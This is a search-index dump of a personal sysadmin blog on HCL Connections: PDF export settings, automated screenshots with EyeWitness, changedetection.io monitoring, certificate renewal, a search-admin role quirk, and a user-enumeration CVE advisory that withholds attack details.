[{"body":"","excerpt":"","ref":"https://stoeps.de/authors/","title":"Authors"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/","title":"Categories"},{"body":"I had some issues with PDF export functionality in HCL Connections the last weeks.\nThe server became unresponsive multiple times due to high load from PDF exports. To quickly address the issue, the simplest solution is to disable the PDF export feature by configuring the icxt.pdfexport.access.requiredrole property in the Resource Environment Entries.\nIn the past I used CSS to hide the PDF button, but users could still call the API or use the browser developer tools to display the button temporarily.\nThe ICXT documentation for PDF Export shows this:\nName Description Default icxt.pdfexport.access.requiredrole Specifies the required access role a user must suffice in order to leverage the PDF Export feature. Valid roles are PDFExport+ItemViewer, PDFExport+ItemEditor and PDFExport+ItemOwner. The roles are calculated based on the HCL Connections content the user wants to execute PDFExport functionality for. PDFExport+ItemEditor So I always thought only these three possible strings are allowed, but when you use any other string, the PDF export does not show up any more. So using stoeps for example disables the feature, or better does not display the PDF buttons any more.\nThen start and stop the IC360_core application.\nNow when you open a Wiki or Blog, then the PDF button is gone:\nDefault:\nDisabled:\n","excerpt":"\u003cp\u003eI had some issues with PDF export functionality in HCL Connections the last weeks.\u003c/p\u003e\n\u003cp\u003eThe server became unresponsive multiple times due to high load from PDF exports. To quickly address the issue, the simplest solution is to disable the PDF export feature by configuring the \u003ccode\u003eicxt.pdfexport.access.requiredrole\u003c/code\u003e property in the Resource Environment Entries.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/disable_pdf_export_in_hcxt/","title":"Disable PDF Export in HCL Connections 8"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/hcl-digital-solutions/","title":"HCL Digital Solutions"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcxt/","title":"Hcxt"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcxt/","title":"Hcxt,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ic360/","title":"Ic360"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ic360/","title":"Ic360,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/icxt/","title":"Icxt"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/icxt/","title":"Icxt,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/","title":"Keywords"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/pdf/","title":"Pdf"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/pdfexport/","title":"Pdfexport,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/","title":"Tags"},{"body":"This week, I investigated an issue with the advanced profiles search in HCL Connections. I had a system which did not show any results in the advanced search for the department number of Connections profiles.\nHCL support tried for three months to reproduce the issue, and the users missed the option to search for their teammates with the advanced profiles search.\nTL;DR I started creating entries in the profiles\u0026rsquo; database in the table empinst.employee. First I created the department name, which did not work in the other system. To be sure that it is not dependent on a broken index, I recreated the index in my demo system.\nThe result was that none of my entries were found in the advanced search.\nI used a deptNumber like HR/TEAM-SOUTH1, my first thought was an issue with the characters / or -, so I created entries without them. Still, none of the departments showed up.\nThen I thought the length of the used string could be the problem, so I added the deptNumber: test to two of the profiles. After recreating the index one more time, a search for test returned one result. To make it short, I made a typo and created one entry with capital T.\nAutomate the process During the tests, I created plenty of strings with different length and spelling. During some CTF, I worked with Eyewhitness to automate screenshots of web URLs.\nJust install Eyewhitness (needs Selenium and Python3) in a container or a local machine, like explained in the repository. It\u0026rsquo;s well documented, just follow the README.\nSo I created the URLs for all used deptNumbers in my profiles database and wrote them to a text file.\nselect unique(PROF_DEPARTMENT_NUMBER)) FROM EMPINST.EMPLOYEE e WHERE PROF_DEPARTMENT_NUMBER != \u0026#39;\u0026#39;; The URL used in the advanced search was https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;displayName=\u0026amp;preferredFirstName=\u0026amp;preferredLastName=\u0026amp;profileTags=\u0026amp;jobResp=\u0026amp;description=\u0026amp;experience=\u0026amp;countryDisplayValue=\u0026amp;email=\u0026amp;telephoneNumber=\u0026amp;deptNumber=SEARCHTERM\nSo I merged the results and the URL to get a list with different URLs and search terms. I tested and found that empty search keywords can be removed. My list of URLs looked like this, and I stored it in urls.txt:\nhttps://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=2 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=3a https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HR/TEAM-SOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HR/TEAMSOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HRTEAM-SOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=HRTEAMSOUTH1 https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=PQRSTUV https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=Test https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=XYZ https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=a https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=abcdefgh https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=bc https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=def https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=ghij https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=ijklmno https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=klmno https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=pqrstu https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=test https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=vwxyzab Now we can use this list to run Eyewhitness and create the screenshots:\ncd Eyewhitness/Python/bin ./EyeWitness.py -f urls.txt --delay 5 --web --no-dns --results 25 --width 1920 --height 1080 We see that Eyewhitness calls the URLs and creates a subfolder with the actual date and time with a collection of URLs and screenshots:\n################################################################################ # EyeWitness # ################################################################################ # Red Siege Information Security - https://www.redsiege.com # ################################################################################ Starting Web Requests (20 Hosts) Attempting to screenshot https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=1 [*] Sleeping for 5 seconds before taking the screenshot Attempting to screenshot https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=2 [*] Sleeping for 5 seconds before taking the screenshot Attempting to screenshot https://cnx8-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026amp;deptNumber=3a [*] Sleeping for 5 seconds before taking the screenshots ... [*] Completed 15 out of 20 services Finished in 33.67001438140869 seconds [*] Done! Report written in the /var/home/stoeps/itsec/EyeWitness/Python/2024-11-03_185026 folder! Would you like to open the report now? [Y/n] I started a local webserver and opened the URL:\npython3 -m http.server Opening the reports.html shows a table with the used URL and the actual screenshot:\nSo we can scroll through all the results and quickly see which searches show results and which do not. I found that all deptNumber entries which contain a capital do not show results, but numbers and lowercase entries work fine.\nThe next time I would even create the database entries for deptNumber via SQL or scripting, then it is even faster.\nEyewhitness can also be used to check URLs regularly and compare screenshots over time. So run a set of URLs before an update and store the results. Then make your changes and run Eyewhitness again. Put the results side by side and compare the result. Or keep both result sets to have proof that everything looked the same after the update.\nAuthentication with Eyewhitness I made it easy in this case and opened profiles for anonymous access, so I could use the URL list and didn\u0026rsquo;t need any login.\nIf you require authentication, you can copy the LtpaToken2 from one of your authenticated requests and add it with --cookies LtpaToken2=... to the Eyewhitness call. Or you automate this step and get the cookie via curl on the console.\n","excerpt":"\u003cp\u003eThis week, I investigated an issue with the advanced profiles search in HCL Connections. I had a system which did not show any results in the advanced search for the department number of Connections profiles.\u003c/p\u003e\n\u003cp\u003eHCL support tried for three months to reproduce the issue, and the users missed the option to search for their teammates with the advanced profiles search.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/eyewhitness-to-automate-screenshots/","title":"Automate screenshots of web pages with Eyewhitness"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/automation/","title":"Automation"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/eyewhitness/","title":"Eyewhitness"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/screenshots/","title":"Screenshots"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/screenshots/","title":"Screenshots,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/support/","title":"Support,"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/tools-i-use/","title":"Tools I Use"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/changedetection/","title":"Changedetection"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/changedetection/","title":"Changedetection,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mastodon/","title":"Mastodon"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/mastodon/","title":"Mastodon,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tools_i_use/","title":"Tools_i_use,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/tools-i-use/","title":"Tools-I-Use"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/toot/","title":"Toot"},{"body":"In the last blogpost I showed how I use an instance of changedetection.io on a Raspberry Pi to monitor and track changes in a ServiceNow portal.\nMeanwhile, I tweaked this a bit more and found a way how I can monitor the RSS Feed of my blog to post a toot on mastodon when I created a new blog post.\nHere are the steps to get the information from the RSS feed. I run this once or twice a day and just grep the latest entry of the RSS feed because I normally do not post more than once a week. So this should be fine for my personal blog.\nAdd mastodon notification First we have to register a new application in the Mastodon instance.\nClick on Development \u0026gt; New application:\nApplication name changedetection (free to select) Application website http://192,168.1.210:5000 (URL of my instance) Redirect URL urn:ietf:wg:oauth:2.0:oob Scopes read:accounts, write:media, write:statuses More details can be found here. Save the document and open it again, Mastodon present you Client key, Client secret and Your access token. For Apprise you need the access token.\nGet the RSS feed and get the latest title and link with xpath The RSS feed looks like this:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34; standalone=\u0026#34;yes\u0026#34;?\u0026gt; \u0026lt;rss version=\u0026#34;2.0\u0026#34; xmlns:atom=\u0026#34;http://www.w3.org/2005/Atom\u0026#34;\u0026gt; \u0026lt;channel\u0026gt; \u0026lt;title\u0026gt;Have you closed all Windows - stories from stoeps on stoeps\u0026lt;/title\u0026gt; ... \u0026lt;item\u0026gt; \u0026lt;title\u0026gt;Toot new blogposts with changedetection.io\u0026lt;/title\u0026gt; \u0026lt;link\u0026gt;http://localhost:1313/posts/2024/toot-new-blogposts/\u0026lt;/link\u0026gt; \u0026lt;pubDate\u0026gt;Fri, 13 Sep 2024 16:00:00 +0200\u0026lt;/pubDate\u0026gt; \u0026lt;guid\u0026gt;http://localhost:1313/posts/2024/toot-new-blogposts/\u0026lt;/guid\u0026gt; \u0026lt;description\u0026gt;\u0026amp;lt;p\u0026amp;gt;In \u0026amp;lt;a href=\u0026amp;#34;http://localhost:1313/posts/2024/changedetection/\u0026amp;#34;\u0026amp;gt;the last blogpost\u0026amp;lt;/a\u0026amp;gt; I showed how I use a instance of changedetection.io on a Rasperry Pi to monitor and track changes in a Service Now portal.\u0026amp;lt;/p\u0026amp;gt; \u0026amp;lt;p\u0026amp;gt;In the meantime I tweaked this a bit more and found a way how I can monitor the \u0026amp;lt;a href=\u0026amp;#34;https://stoeps.de/index.xml\u0026amp;#34; target=\u0026amp;#34;_blank\u0026amp;#34;\u0026amp;gt;RSS Feed \u0026amp;lt;i class=\u0026amp;#34;las la-external-link-alt la-xs\u0026amp;#34;\u0026amp;gt;\u0026amp;lt;/i\u0026amp;gt;\u0026amp;lt;/a\u0026amp;gt; of my blog to post a toot on mastodon when I created a new blog post.\u0026amp;lt;/p\u0026amp;gt;\u0026lt;/description\u0026gt; \u0026lt;/item\u0026gt; \u0026lt;item\u0026gt; ... I want to create a toot with the post title, link and summary (description). Using the Basic fast Plaintext/HTTP Client is sufficient here.\nThe steps \u0026ldquo;Browser Steps\u0026rdquo; and \u0026ldquo;Visual Filter Selector\u0026rdquo; can be ignored.\nIn \u0026ldquo;Filters \u0026amp; Triggers\u0026rdquo; add the xpath selection:\nI use concat here, to combine the three fields in the toot.\nThis selects title, link and description of the newest blog post in the feed. Additionally I start the post with \u0026ldquo;OMB: New article\u0026rdquo;.\nxpath:concat(\u0026#39;New article \u0026#34;\u0026#39;, //item[1]/title,\u0026#39;\u0026#34; published \u0026#39;, //item[1]/link/text(), \u0026#39;. \u0026#39;, //item[1]/description/text()) Enable a mastodon app in changedetection notification I want to use Mastodon just for one entry in Changedetection, so I keep mail notification in my default settings and change notification only for this single entry.\nAccess token The mastodon instance visibility (you can also use direct to include just some users) {{current_snapshot}} {{current_snapshot}} is important, because this contains the output of our xpath from above. I have changed the title of the notification to OMB: now, this appears at the top of the toot.\nFor the last blog post this notification looks like this:\nHope this helps with your notifications, the options of Apprise are really awesome and you can post to any chat app or use ntfy to get an update directly on your mobile.\nDo not spam your mastodon instance! For testing you can send the toot directly just to your own user!\n","excerpt":"\u003cp\u003eIn \u003ca href=\"/posts/2024/changedetection/\"\u003ethe last blogpost\u003c/a\u003e\n I showed how I use an instance of changedetection.io on a Raspberry Pi to monitor and track changes in a ServiceNow portal.\u003c/p\u003e\n\u003cp\u003eMeanwhile, I tweaked this a bit more and found a way how I can monitor the \u003ca href=\"https://stoeps.de/index.xml\" target=\"_blank\"\u003eRSS Feed \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n of my blog to post a toot on mastodon when I created a new blog post.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/toot-new-blogposts/","title":"Toot new blogposts with changedetection.io"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/toot/","title":"Toot,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/changedetection/","title":"Changedetection"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/changedetection.io/","title":"Changedetection.io"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/knowledgebase/","title":"Knowledgebase"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/knowledgebase/","title":"Knowledgebase,"},{"body":"The HCL Software knowledge base is built with ServiceNow . You can register and subscribe for channels and documents. You receive mails for new documents and changed documents you have subscribed for.\nThe last five years since HCL migrated to this system, I missed the option to get updates via RSS (maybe I\u0026rsquo;m old, but I still love reading countless updates in my newsreader). Mails about updated documents just tell you that a document with link is updated, but you don\u0026rsquo;t get any information of what has changed in the article.\nPlenty of entries in the knowledge base are so-called defect articles, which describe a known bug, if there is a workaround and most of the time when it will be fixed. When the defect article is released, your support agent will ask you to close the case and follow or subscribe the defect article.\nI\u0026rsquo;m following more than 10 defect articles and mails with the information “this doc has changed” do not help me. It\u0026rsquo;s challenging to track the changes and when there is a delay for a fix, you need to remember if the fix version was different before the change.\nFor some months, I have used changedetection.io , with changedetection I can track all relevant defect articles, updates on fix lists, changelogs and new documents for search terms like \u0026ldquo;8.0CR7\u0026rdquo;. I run changedetection on a Rasperry Pi 4 with docker-compose , but it\u0026rsquo;s also possible to deploy with helm on Kubernetes .\nOn the pi I use the following docker-compose.yml:\nversion: \u0026#39;3.2\u0026#39; services: changedetection: image: ghcr.io/dgtlmoon/changedetection.io container_name: changedetection hostname: changedetection volumes: - changedetection-data:/datastore ports: - 5000:5000 restart: unless-stopped environment: - PLAYWRIGHT_DRIVER_URL=ws://playwright-chrome:3000/?stealth=1\u0026amp;--disable-web-security=true playwright-chrome: hostname: playwright-chrome image: browserless/chrome restart: unless-stopped browser-chrome: hostname: browser-chrome image: seleniarm/standalone-chromium:latest volumes: - /dev/shm:/dev/shm restart: unless-stopped volumes: changedetection-data: Just run docker compose up -d and after some minutes the service is available.\nNow open http://:5000 and start adding interesting URLs.\nI monitor for example:\nHCL knowledge article search - Connections HCL Connections Desktop Plug-ins for Microsoft Windows Connections 8.0 Cumulative Release (CR) List Tiny Editors for HCL Connections Fix List System requirements for HCL Connections 8.0 CR3 and above Then I have added several defect articles which were announced in one of my support cases, but aren\u0026rsquo;t published until now.\nWhich settings do I use within Changedetection.io? Check for changes all eight hours Use 5 minutes jitter between checks Get the title of the page and set it as title in Changedetection You can get notification for a bunch of collaboration tools, here I made an example with mail notification and template. Or you add the rss feed to your feed reader.\nServiceNow is using a lot of JavaScript to render the page, so we have to use the Playwright option here.\nAdd the first page I want to use the 8.0 fix list as an example now. The fix list URL is https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0102882 .\nLet\u0026rsquo;s take a look at the first lines:\nlast updated with days, so this changes each day each time when a new user is watching the document, the counter increases average rating of the document documents matching the content of the open document we want just the content within this border without the points 1, 2 and 3 But changedetection helps us to monitor just the content we want to have.\nWith browser steps and visual filter selector you can select the content you would like to monitor. With browser steps, you can add clicks or run tasks (change sorting, for example).\nI use the following filters, to select the content like this:\nCSS/JSONPath/JQ/XPath Filters: /html/body/div/section/main/div[2]/div/sp-page-row/div/div[1]/span[1]/div/div/div/div[2]/article\nRemove elements:\n.published .views .str-rating .title-secondary-date So now just changes in the text of the defect / knowledge base article will trigger a notification.\nLists and Browser steps The last weeks I got a log of notifications from the lists I follow. Like https://support.hcltechsw.com/csm?id=kb_search\u0026spa=1\u0026language=en\u0026kb_category=432e1eb81b49001483cb86e9cd4bcb32 , I don\u0026rsquo;t know why, but it seemed that the sort order changed multiple times during the day. It could be a cluster issue, but I looked for a way to have always the newest documents on top.\nThe easiest way was using the browser steps:\nHere, you see that the triangle next to Newest shows oldest documents first (descending sort order). I couldn\u0026rsquo;t find a way to change this via cookies or URL parameters. So I built a short JavaScript.\nStart the browser steps, the page loads within 10 or 15 seconds.\nThen add 1. a wait for text: “Applied Filters” step, so the next step only triggers if the page loaded. Next step Execute JavaScript and add if (document.getElementsByClassName('fa-caret-down')[1].offsetParent === null) { document.querySelectorAll('[aria-label=\u0026quot;Sorted by Newest Ascending\u0026quot;]')[0].click() } This clicks on Newest, when the sort order is set to descend (downwards caret hidden). So the sort order is now always Newest first.\nThe deployment on a Raspberry Pi monitors over 50 views and documents from ServiceNow, and I host multiple services on it. Therefore, the whole monitoring needs just a few resources and could also run next to Component Pack.\nWe can now check each change in the diff view, like here in the Desktop plugins document, we see the download link has changed.\nSummary This could be easier, when ServiceNow would support RSS (or HCL activates it), but now I have a reliable system to track changes in the knowledge base and documentation.\n","excerpt":"\u003cp\u003eThe \u003ca href=\"https://support.hcltechsw.com/csm?id=kb_search\" target=\"_blank\"\u003eHCL Software knowledge base \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is built with \u003ca href=\"https://support.hcltechsw.com/csm?id=kb_search\" target=\"_blank\"\u003eServiceNow \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. You can register and subscribe for channels and documents. You receive mails for new documents and changed documents you have subscribed for.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/changedetection/","title":"Monitor HCL Software Knowledgebase for changes"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/opensource/","title":"Opensource"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/opensource/","title":"Opensource,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/servicenow/","title":"Servicenow"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/servicenow/","title":"Servicenow,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/apple/","title":"Apple"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/apple/","title":"Apple"},{"body":"Last week I checked some HCL Connections 8 CRx downloads in Flexnet and recognized these packages available since 2024-06-13:\nAPNS (Apple Push Notification Service) certificates renewal for 2025, sounds normal, these updates need to be installed each year. First, I checked for the knowledge base document mentioned in the file name . It\u0026rsquo;s not published until now.\nSo I downloaded the package and extracted the content. The included certificates are valid from\nYou see the certificates are valid from 2024-04-25 to 2025-05-25, so they start and end in the middle of the year. So I got a bit nervous and extracted the certificates of my fresh installed HCL Connections 8.0CR6.\nThe certificates deployed with CR6 are valid until 2024-07-04, so less than two weeks left to update the system, or Apple push notifications stop working.\nMy opened case to ask for details and to publish the missing knowledge base article is pending since Thursday, so I decided to write the blog post. Install the update, or your push notifications stop working on the 4th of July. The filename or description \u0026ldquo;APNS renewals for 2025\u0026rdquo; is misleading, asked to give this a more appropriate description.\nThe update is available for 8.0CR5 and 8.0CR6.\n","excerpt":"\u003cp\u003eLast week I checked some \u003ca href=\"https://hclsoftware.flexnetoperations.com/flexnet/operationsportal/entitledDownloadFile.action?downloadPkgId=HCL_Connections_8.0_CRx\u0026amp;activateId=7335b327-6509-ef11-9f89-000d3a54eb4a\" target=\"_blank\"\u003eHCL Connections 8 CRx downloads \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Flexnet and recognized these packages available since 2024-06-13:\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/push-notification-update/","title":"Apple push notification certificates expire on 4th of July 2024"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/certificate/","title":"Certificate,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/certificates/","title":"Certificates"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/notifications/","title":"Notifications"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/notifications/","title":"Notifications,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/push/","title":"Push"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/push/","title":"Push,"},{"body":"I showed, in several slides and sessions, how you can use the search-admin role in the search application of HCL Connections for troubleshooting and reviewing some key configurations.\nIn several environments, my user or other administrative users have this role, just to access the link to /search/serverStatus for example.\nHow it started Some years ago, when IBM owned Connections, we had a case, that a user with the search application search-admin role didn\u0026rsquo;t see results in the profiles advanced search. The result was always empty.\nAs it already was after the birth of pink/component pack we decided to close the case, as a new search was already planned and announced.\nSo I forgot about this topic and started again to investigate an issue with profiles advanced search, end of 2023. My finding was that users with search-admin role do not get results in advanced search (/search/web/jsp/advancedSearch.jsp) of Connections. Any search term gives an empty result.\nThe journey Profiles advanced Search in Connections 8 is a bit hidden. Open People \u0026gt; Directory \u0026gt; Display Full search options\nProfiles advanced search Now searching for a given name (example: https://cnx8cr6-db2.stoeps.home/profiles/html/advancedSearch.do?keyword=\u0026displayName=\u0026preferredFirstName=\u0026preferredLastName=jones2\u0026profileTags=\u0026jobResp=\u0026description=\u0026experience=\u0026organizationTitle=\u0026workLocation%24city=\u0026workLocation%24state=\u0026countryDisplayValue=\u0026email=\u0026telephoneNumber= )\nProfiles advanced without search-admin role Profiles advanced with search-admin role After recognizing the root cause, a search in my notes and local documentation, brought up the old case and I opened a new one at HCL support.\nAfter three months of waiting, I got the answer:\nThis is to inform you that the development has gone through the issue. This is working as expected.\nHCL Support Ok, as this behavior seems to be intended, I asked for updated documentation or knowledge base article. I even created a pull request for the Connections 8 documentation.\nSo, two months ago, the page Roles was updated with the wording:\nNote: Users with this role may experience certain limitations with UI-based search functionality.\nHCL Connections 8 documentation I wasn\u0026rsquo;t pleased with this because when something is working as intended, I would clearly state what happens when you assign the role. So I asked for a change. Which was released with CR6 now:\nNote: Granting the search-admin role exclusively for auditing tasks to a user may inadvertently expose restricted content. Consequently, the role is intended to have limitations.\nHCL Connections 8 documentation To be honest, that\u0026rsquo;s even worse. Therefore, there is a role for auditing, but it is built to have limitations. I don\u0026rsquo;t understand! Either I have an audit role (which should get everything), or I have limitations.\nSummary To prevent further time wastage, I\u0026rsquo;m closing the case and jotting down a note to remember this shortcoming. But I don\u0026rsquo;t want to wait any longer for another change or for my proposal to be merged.\nBe aware, when you assign the search-admin role in the search application to a user, the advanced search will not return any result.\nBtw, there is another documentation page Analyzing results from the search serverStatus page , which tells you to set the role for troubleshooting, but also does not contain a warning about the circumstances. Just a recommendation to use a new user for the role.\n","excerpt":"\u003cp\u003eI showed, in several slides and sessions, how you can use the search-admin role in the search application of HCL Connections for troubleshooting and reviewing some key configurations.\u003c/p\u003e\n\u003cp\u003eIn several environments, my user or other administrative users have this role, just to access the link to \u003ccode\u003e/search/serverStatus\u003c/code\u003e for example.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/search-admin/","title":"Be careful with search-admin role in HCL Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/connections/","title":"Connections,"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcl/","title":"Hcl"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-connections/","title":"Hcl Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/j2ee/","title":"J2ee"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/role/","title":"Role"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/role/","title":"Role,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/search/","title":"Search"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/search/","title":"Search,"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cve/","title":"Cve"},{"body":"Some time back, I stumbled upon a flaw in HCL Connections 7 and 8 that allowed for user enumeration. This flaw could be exploited by anonymous users.\nUser enumeration occurs when an HTML form provides different responses depending on whether a user is registered or not. These responses may vary in content, such as \u0026ldquo;We sent a mail to your registered address\u0026rdquo; versus \u0026ldquo;You don’t have an account,\u0026rdquo; or in HTTP response codes and response times. This vulnerability extends beyond HTML forms and affects APIs as well.\nWhy is user enumeration problematic? User enumeration is identified in the OWASP Top 10 as A07:2021 – Identification and Authentication Failures . When attackers can identify available user accounts on a platform, two potential attack scenarios emerge:\nLDAP servers may lock accounts after a certain number of incorrect password attempts (e.g., Domino with internet password lockout or Active Directory account lockout policy). Consequently, attackers could deliberately block user accounts, leading to a denial of service-like situation.\nIn my observation, most Connections environments directly use Active Directory or other LDAP servers. Thus, if an attacker manages to lock an account, it affects more than just Connections; other services may also be disrupted.\nWithout a lockout policy, attackers can execute brute force attacks on user accounts, attempting to discover valid passwords.\nCredential stuffing, a common tactic, involves utilizing compromised passwords from one service to attempt unauthorized access to other services where the user may have reused the same password. Attackers automate this process, leveraging automated scripts to rapidly test stolen credentials across various platforms, exploiting the common practice of password reuse among users. This method can result in unauthorized access to accounts and pose significant security risks across multiple services.\nPreventing credential stuffing: Avoid reusing passwords for multiple services, as stolen login data can easily be used for other services.\nHow to address this issue: The details of this problem can be found in the Security Bulletin: HCL Connections Security Update for User Enumeration Vulnerability (CVE-2024-23557) , which provides download links and public information regarding the issue.\nI opt not to delve into the specifics of the attack or application details.\nHCL Connections 8: The problem has been resolved in Connections 8.0 CR5 and subsequent versions.\nHCL Connections 7: For Connections 7, you need to deploy the latest CFix.70.2403 along with the additional KB0111309 ifix.\nI recommend installing these fixes, when your Connections environment is accessible from the internet.\n","excerpt":"\u003cp\u003eSome time back, I stumbled upon a flaw in HCL Connections 7 and 8 that allowed for user enumeration. This flaw could be exploited by anonymous users.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/cve-2024-23557/","title":"CVE-2024-23557 - HCL Connections Security Update for User Enumeration Vulnerability"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl/","title":"Hcl"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hclcnx/","title":"Hclcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hclconnections/","title":"Hclconnections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/security/","title":"Security"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vulnerability/","title":"Vulnerability"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/chemnitz/","title":"Chemnitz"},{"body":"This year marked my inaugural attendance at the Chemnitzer Linuxdays. The experience was fantastic, and I had the pleasure of connecting with numerous intriguing individuals. Chemnitzer Linuxdays stands out as one of the premier events in the Linux and open-source community. With 3,200 attendees this year, participants had the opportunity to engage with a diverse array of topics through 94 talks and hands-on workshops .\nMy talk was about Asciidoctor in Ansible roles and the recording can be viewed with others on media.ccc.de :\nSlides for download and reveal.js version .\nSee some german blog posts about the CLT 24:\nJoerg Kastnig Christian Stankowic ","excerpt":"\u003cp\u003eThis year marked my inaugural attendance at the Chemnitzer Linuxdays. The experience was fantastic, and I had the pleasure of connecting with numerous intriguing individuals. Chemnitzer Linuxdays stands out as one of the premier events in the Linux and open-source community. With 3,200 attendees this year, participants had the opportunity to engage with a diverse array of topics through \u003ca href=\"https://chemnitzer.linux-tage.de/2024/de/programm/vortraege\" target=\"_blank\"\u003e94 talks \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://chemnitzer.linux-tage.de/2024/de/programm/workshops\" target=\"_blank\"\u003ehands-on workshops \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2024/chemnitzer-linuxtage/","title":"Chemnitzer Linuxtage 